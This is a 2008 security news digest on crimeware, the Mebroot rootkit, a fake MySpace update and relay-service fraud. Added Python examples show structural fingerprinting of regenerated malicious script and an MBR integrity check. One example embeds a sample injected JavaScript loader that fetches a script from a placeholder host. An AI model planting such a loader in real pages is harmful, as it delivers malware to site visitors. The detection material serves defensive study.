Tuesday, January 15, 2008

Daily Report

• The Associated Press reports that a man blew up a dump truck about a mile away from the Prairie Island nuclear plant in Minnesota. The vice president of the plant site said the plant was put on heightened security for over two hours until officials could determine what had happened. The plant returned to normal activity once investigators determined that the blast was not connected to the plant. (See item 5)

• Vnunet.com reports that security experts have warned of a crimeware attack caused by an “extremely elusive” Trojan that sends data from infected machines directly to the malware author. Stolen data can include documents, passwords, surfing habits or any other sensitive information of interest to the criminal. More than 10,000 websites in the US were infected by this malware in December alone. (See item 26)

Information Technology

26. January 14, vnunet.com – (National) Hackers unleash ‘insidious’ crimeware attack. Security experts have warned of a crimeware attack that threatens to turn highly trusted websites into “insidious traps” for unwary visitors. Finjan’s Malicious Code Research Center said that more than 10,000 websites in the US were infected by this malware in December alone. The attack, which the firm has designated ‘random js toolkit,’ is an “extremely elusive” Trojan that sends data from infected machines directly to the malware author. Stolen data can include documents, passwords, surfing habits or any other sensitive information of interest to the criminal. The JavaScript toolkit is generated dynamically and changes every time it is accessed, which makes it almost impossible for traditional signature-based anti-malware products to detect. Finjan’s chief technology officer explained that signature-based detection for dynamic script is ineffective. “‘Signaturing’ the exploiting code itself is not effective, since these exploits change continually to stay ahead of current zero-day threats and available patches,” he said. “Keeping an up-to-date list of ‘highly-trusted/doubtful’ domains serves only as a limited defense against this attack vector.” He added that the ‘random js toolkit’ is an example of the recent trend among cyber-criminals to undermine ‘trusted’ websites. “Studies in mid-2007 showed nearly 30,000 infected web pages being created every day,” he said. “About 80 per cent of pages hosting malicious software or containing drive-by downloads with damaging content were located on hacked legitimate sites. Today the situation is much worse.”
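The item above explains why a per-request, regenerated script defeats byte signatures. The following Python is an added illustration of that point from the detection side; it is not code from the article or from Finjan. It assumes two constructed, inert "fetches" of the same injected script (placeholder `.invalid` domains, randomised identifiers, different whitespace) and shows that a SHA-256 byte signature differs on every fetch while a fingerprint over the normalised token structure, in which randomisable identifiers, strings and numbers are replaced by class markers and only the DOM API calls are kept, stays the same. The tokenizer is a small regex lexer written for this example, not a full JavaScript parser.

```python
"""Byte signature versus structural fingerprint for regenerated script.

Added example; the scripts below are constructed, inert samples that do
nothing when run, and the .invalid hostnames are placeholders."""
import hashlib
import re

# Two constructed fetches of the "same" injected script: only identifier
# names, string literals and whitespace differ between them.
FETCH_1 = """
var qz81 = document.createElement("script");
qz81.src = "http://placeholder-a.invalid/k3j2.js";
document.body.appendChild(qz81);
"""
FETCH_2 = """
var mmx=document.createElement('script');mmx.src='http://placeholder-b.invalid/zz91.js';
document.body.appendChild(mmx);
"""
# A constructed benign script with a different structure, for contrast.
BENIGN = "var total = 0; for (var i = 0; i < 10; i++) { total += i; }"

# Minimal lexer: strings, numbers, identifiers/keywords, single-char
# punctuators, whitespace.  Characters matching none of these (e.g. '@')
# are silently skipped by finditer, which is acceptable for a fingerprint.
TOKEN_RE = re.compile(r"""
    (?P<str>"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')   # string literal
  | (?P<num>\d+(?:\.\d+)?)                         # numeric literal
  | (?P<id>[A-Za-z_$][A-Za-z0-9_$]*)               # identifier or keyword
  | (?P<punct>[{}()\[\];,.=+\-*/<>!&|?:])          # single-char punctuator
  | (?P<ws>\s+)
""", re.VERBOSE)

# Names that carry structural meaning and are therefore kept verbatim;
# every other identifier is an attacker-chosen name and collapses to ID.
KEEP = {
    "var", "let", "const", "function", "return", "if", "else", "new",
    "document", "window", "body", "head", "src",
    "createElement", "appendChild", "getElementsByTagName",
}


def normalize(script):
    """Return the token-class sequence of a script with random parts removed."""
    out = []
    for m in TOKEN_RE.finditer(script):
        kind = m.lastgroup          # name of the alternative that matched
        if kind == "ws":
            continue
        if kind == "str":
            out.append("STR")
        elif kind == "num":
            out.append("NUM")
        elif kind == "id":
            out.append(m.group() if m.group() in KEEP else "ID")
        else:
            out.append(m.group())   # punctuator kept as-is
    return out


def byte_signature(script):
    """Traditional signature: hash of the exact bytes served."""
    return hashlib.sha256(script.encode()).hexdigest()


def structural_fingerprint(script):
    """Hash of the normalised token sequence; stable across regeneration."""
    return hashlib.sha256(" ".join(normalize(script)).encode()).hexdigest()


def matches_structurally(a, b):
    return structural_fingerprint(a) == structural_fingerprint(b)


if __name__ == "__main__":
    print("byte signatures equal:     ", byte_signature(FETCH_1) == byte_signature(FETCH_2))
    print("structural fingerprints eq:", matches_structurally(FETCH_1, FETCH_2))
    print("benign matches injected:   ", matches_structurally(FETCH_1, BENIGN))
```

The structural fingerprint is still a signature, just one taken at a level the generator does not randomise; a generator that also varies the API calls or statement order would require a further normalisation step, so a fingerprint like this belongs alongside behavioural checks rather than replacing them.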

27. January 13, IDG News Service – (National) New rootkit uses old trick to hide. A new type of malicious software has emerged, using a decades-old technique to hide itself from antivirus software. The malware, called Trojan.Mebroot by Symantec, installs itself in the master boot record, the first part of the computer’s hard drive read on startup, then makes changes to the Windows kernel, making it hard for security software to detect it. Criminals have been installing Trojan.Mebroot, known as a master boot record rootkit, since mid-December, and were able to infect nearly 5,000 users in two separate attacks. Once installed, the malware gives attackers control over the victim’s machine. The criminals are using several different versions of this attack code, some of which some antivirus products do not yet detect.
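A master boot record rootkit of the kind described above has to rewrite the first 512-byte sector of the disk, and that sector is small and well structured enough to baseline. The following Python is an added example of such an integrity check and is not code from Symantec or from the article. It parses the classic MBR layout (bootstrap code in the first 440 bytes, four 16-byte partition entries at offset 446, the 0x55 0xAA boot signature at offset 510), hashes the code area, and compares it with a baseline hash taken from a known-good image. The sector bytes are constructed here with a helper so the example runs offline; on a real host the sector would be read from the raw disk device with administrator rights.

```python
"""Integrity check for the master boot record (MBR).

Added example.  All sector contents below are constructed; the bootstrap
bytes are a generic x86 prologue used only as sample data."""
import hashlib
import struct

SECTOR = 512
CODE_AREA = 440      # bootstrap code; the 4-byte disk signature follows at 0x1B8
PART_TABLE = 446     # four 16-byte partition entries
BOOT_SIG = 510       # 0x55 0xAA
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sectors


def partition_entry(boot, ptype, lba_start, sectors):
    """Build one 16-byte partition entry (CHS fields left zero)."""
    return struct.pack(ENTRY_FMT, boot, b"\0\0\0", ptype, b"\0\0\0", lba_start, sectors)


def build_sector(code, entries):
    """Construct a sector: bootstrap code, partition table, boot signature."""
    assert len(code) <= CODE_AREA
    sec = bytearray(SECTOR)
    sec[:len(code)] = code
    for i, entry in enumerate(entries[:4]):
        sec[PART_TABLE + 16 * i: PART_TABLE + 16 * (i + 1)] = entry
    sec[BOOT_SIG:] = b"\x55\xaa"
    return bytes(sec)


def parse_mbr(sector):
    """Validate the sector and return its code-area hash and partition list."""
    if len(sector) != SECTOR or sector[BOOT_SIG:] != b"\x55\xaa":
        raise ValueError("not a valid MBR: bad length or boot signature")
    parts = []
    for i in range(4):
        boot, _, ptype, _, lba, n = struct.unpack_from(ENTRY_FMT, sector, PART_TABLE + 16 * i)
        if ptype != 0:                       # type 0 marks an unused entry
            parts.append({"bootable": boot == 0x80, "type": ptype,
                          "lba_start": lba, "sectors": n})
    return {"code_hash": hashlib.sha256(sector[:CODE_AREA]).hexdigest(),
            "partitions": parts}


def check_mbr(sector, baseline_code_hash):
    """Return a list of findings; an empty list means the sector matches baseline."""
    info = parse_mbr(sector)
    findings = []
    if info["code_hash"] != baseline_code_hash:
        findings.append("bootstrap code differs from baseline")
    bootable = [p for p in info["partitions"] if p["bootable"]]
    if len(bootable) != 1:
        findings.append(f"{len(bootable)} partitions flagged bootable (expected 1)")
    return findings


# Constructed known-good sector: generic prologue bytes plus NOP padding,
# and a single bootable type-0x07 (NTFS) partition starting at LBA 2048.
GOOD_CODE = bytes([0xFA, 0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C]) + b"\x90" * 16
PARTITIONS = [partition_entry(0x80, 0x07, 2048, 204800)]
GOOD_SECTOR = build_sector(GOOD_CODE, PARTITIONS)
BASELINE_HASH = parse_mbr(GOOD_SECTOR)["code_hash"]

# Constructed tampered sector: same partition table, first bytes of the
# bootstrap code replaced (a bootkit keeps the table so the system still boots).
TAMPERED_CODE = b"\xe9\x10\x00" + GOOD_CODE[3:]
TAMPERED_SECTOR = build_sector(TAMPERED_CODE, PARTITIONS)

if __name__ == "__main__":
    print("known-good:", check_mbr(GOOD_SECTOR, BASELINE_HASH))
    print("tampered:  ", check_mbr(TAMPERED_SECTOR, BASELINE_HASH))
```

The check only catches a rewrite of the sector on disk; a rootkit that is already running can filter raw-disk reads so the original sector is returned, so the baseline comparison is most trustworthy when the disk is read from a clean boot medium rather than from the running system.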


28. January 12, IDG News Service – (National) Hacked MySpace page serves up fake Windows update. There is now one more reason to be security-conscious while using MySpace.com: fake Microsoft updates. Using a hacked MySpace profile, online criminals are trying to trick victims into downloading a malicious Trojan horse program by disguising it as a Microsoft update, according to researchers at security vendor McAfee. The attack is certainly not widespread -- McAfee has seen it used on only one MySpace profile -- but it does show how sites like MySpace can be abused by criminals. Web surfers are presented with what appears to be a popup window advising them to download the latest version of Microsoft’s Windows Malicious Software Removal Tool, which was just released this Tuesday. This software is distributed by Microsoft to help Windows users rid their systems of malware. In reality, the popup window is just part of a larger image that takes up most of the computer screen. If the user clicks anywhere on this image, his computer will then begin to download the Trojan program. The Trojan, known as TFactory, is a well-known piece of code that has been used by criminals for well over a year, according to a security research manager with McAfee. Hackers were able to launch this attack because they either discovered a flaw in the MySpace code or found a way of taking over user accounts, he said. “Our best guess is [the owner of the one MySpace profile] just got their password and user name phished,” he said. Social networking sites allow their members to use an array of powerful Web programming tools that are increasingly coming under the scrutiny of hackers looking for ways to misuse them. In November, hackers found a way to serve up Web-based attack code from the MySpace profiles of a number of popular musical artists.


Communications Sector

29. January 13, Baltimore Sun – (National) FCC warns of fraud via phone relay service. The Federal Communications Commission is warning businesses that people posing as hearing-impaired consumers have been misusing the Internet-based telecommunications relay service (TRS) to commit fraudulent business transactions. The Americans with Disabilities Act of 1990 and FCC regulations require that calls made using TRS be “functionally equivalent” to telephone calls. Reaching a specially trained communications assistant on TRS and instructing them to make a call is, in effect, the same as receiving a dial tone. Anyone can use TRS, and unfortunately, the FCC says, people without disabilities who are posing as hearing-impaired are using TRS and stolen or fake credit cards to scam businesses. While the ADA prohibits businesses from rejecting calls made using TRS, businesses can take steps to protect themselves against fraud. The FCC is working with the Department of Justice, FBI and Federal Trade Commission to stop fraudulent transactions made by phone or over the Internet. To better protect yourself, the FCC urges merchants accepting orders by telephone for goods or services to take steps to ensure that any order placed by phone is valid and the purchaser is authorized to use a particular credit card. Merchants should also beware of callers who are happy to order “whatever you have in stock; supply multiple credit cards as one or more are declined; can’t provide the credit card verification code number (the three-digit number on the back of the card); want goods shipped through a third party and/or to an overseas location; and change delivery or payment method after the order has been approved.” If you believe you have been a victim of fraud or attempted fraud, report it to the FTC at www.ftc.gov or 888-FTC HELP.